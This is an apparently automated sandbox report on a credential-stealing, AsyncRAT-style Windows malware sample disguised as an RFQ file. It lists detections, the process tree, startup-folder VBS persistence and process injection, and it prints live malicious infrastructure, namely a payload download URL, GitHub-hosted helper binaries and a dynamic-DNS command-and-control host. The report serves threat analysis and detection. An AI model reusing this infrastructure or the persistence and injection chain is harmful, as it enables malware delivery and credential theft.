Edit tour

Windows Analysis Report
RFQ-12202431_ACD_Group.pif.exe

Overview

General Information

Sample name:	RFQ-12202431_ACD_Group.pif.exe
Analysis ID:	1583542
MD5:	07a7551da7299874afd2c3e299eca83a
SHA1:	250884b7f1c7b152ca82f663d2e91986cec83db5
SHA256:	579054d208bdfde13c82c6c998e981f0559f69908a1ebc34249c2657a5d1c59d
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Drops VBS files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

RFQ-12202431_ACD_Group.pif.exe (PID: 3052 cmdline: "C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe" MD5: 07A7551DA7299874AFD2C3E299ECA83A)

InstallUtil.exe (PID: 5876 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 1452 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

Count.exe (PID: 1648 cmdline: "C:\Users\user\AppData\Roaming\Count.exe" MD5: 07A7551DA7299874AFD2C3E299ECA83A)

InstallUtil.exe (PID: 3052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.390523023200.00000000041B7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.390292373562.000000000300C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.390311703554.0000000006CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.390302174360.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 3052	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 3052	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 5876	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Count.exe PID: 1648	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Count.exe PID: 1648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 3052	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.RFQ-12202431_ACD_Group.pif.exe.6cc0000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Count.exe.41b7428.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.RFQ-12202431_ACD_Group.pif.exe.4231da0.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, SourceProcessId: 3052, StartAddress: 73197850, TargetImage: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe, TargetProcessId: 3052

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4972, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , ProcessId: 1452, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4972, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , ProcessId: 1452, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe, ProcessId: 3052, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T02:01:19.076542+0100	2035595	1	Domain Observed Used for C2 Detected	193.187.91.218	50787	192.168.11.20	49775	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: RFQ-12202431_ACD_Group.pif.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

Avira: detection malicious, Label: HEUR/AGEN.1308638

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: RFQ-12202431_ACD_Group.pif.exe	ReversingLabs: Detection: 26%
Source: RFQ-12202431_ACD_Group.pif.exe	Virustotal: Detection: 29%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: RFQ-12202431_ACD_Group.pif.exe

Joe Sandbox ML: detected

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49776 version: TLS 1.2

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.00000000049C7000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390312248341.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.390523023200.000000000464C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.00000000049C7000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390312248341.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.390523023200.000000000464C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06D9EBE2h	0_2_06D9EBEB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06D9EBE2h	0_2_06D9EED1
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06D97FF7h	0_2_06D97C18
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06D97FF7h	0_2_06D97C09
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 0684EBE2h	4_2_0684EBEB
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 0684EBE2h	4_2_0684EED1
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 06847FF7h	4_2_06847C09
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 06847FF7h	4_2_06847C18

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.187.91.218:50787 -> 192.168.11.20:49775

Uses dynamic DNS services

Source: unknown

DNS query: name: pureeratee.duckdns.org

Source: global traffic

TCP traffic: 192.168.11.20:49775 -> 193.187.91.218:50787

Source: Joe Sandbox View

ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.chirreeirl.com
Source: global traffic	DNS traffic detected: DNS query: pureeratee.duckdns.org

Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390290705646.0000000001120000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390525906958.0000000006088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390290705646.0000000001120000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390502397059.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: InstallUtil.exe, 00000002.00000002.391405619201.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390504748872.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390309338694.0000000006710000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390525906958.0000000006088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.390523023200.000000000431A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390309338694.0000000006710000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391414687526.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390525906958.0000000006088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.000000000300C000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390504748872.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.chirreeirl.com
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390290705646.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390502397059.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.chirreeirl.com/
Source: RFQ-12202431_ACD_Group.pif.exe, Count.exe.0.dr	String found in binary or memory: https://www.chirreeirl.com/wp-panel/uploads/Wlvdlivs.mp3

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443

Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49776 version: TLS 1.2

System Summary

.NET source code contains very large array initializations

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4cf9c40.3.raw.unpack, Oou6f20t2x6LiBYUPV.cs

Large array initialization: QBntoY4j5: array initializer size 304912

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQ-12202431_ACD_Group.pif.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E46B00 NtResumeThread,	0_2_06E46B00
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E43898 NtProtectVirtualMemory,	0_2_06E43898
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E46AFB NtResumeThread,	0_2_06E46AFB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E43890 NtProtectVirtualMemory,	0_2_06E43890
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06820990 NtProtectVirtualMemory,	4_2_06820990
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_068237F8 NtResumeThread,	4_2_068237F8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06820989 NtProtectVirtualMemory,	4_2_06820989
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_068237F0 NtResumeThread,	4_2_068237F0

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02EA28B8	0_2_02EA28B8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02EA2897	0_2_02EA2897
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02EA2E3A	0_2_02EA2E3A
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B57471	0_2_06B57471
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B58DDB	0_2_06B58DDB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B550A8	0_2_06B550A8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B516F8	0_2_06B516F8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B516E9	0_2_06B516E9
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B5D390	0_2_06B5D390
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B55098	0_2_06B55098
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C34610	0_2_06C34610
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C30040	0_2_06C30040
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C310E0	0_2_06C310E0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C310F0	0_2_06C310F0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C30023	0_2_06C30023
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C35C28	0_2_06C35C28
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C34947	0_2_06C34947
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C47350	0_2_06C47350
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C47340	0_2_06C47340
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C46090	0_2_06C46090
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C460A0	0_2_06C460A0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C40040	0_2_06C40040
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C47841	0_2_06C47841
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C40027	0_2_06C40027
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D99F28	0_2_06D99F28
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D94470	0_2_06D94470
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D9EED1	0_2_06D9EED1
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D9E3EA	0_2_06D9E3EA
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D9C3B0	0_2_06D9C3B0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D9C3A0	0_2_06D9C3A0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E40040	0_2_06E40040
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E40EF7	0_2_06E40EF7
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E47A3C	0_2_06E47A3C
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E40F08	0_2_06E40F08
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E40006	0_2_06E40006
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E475A0	0_2_06E475A0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06E475B0	0_2_06E475B0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_0706EEC8	0_2_0706EEC8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_07050006	0_2_07050006
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_07050040	0_2_07050040
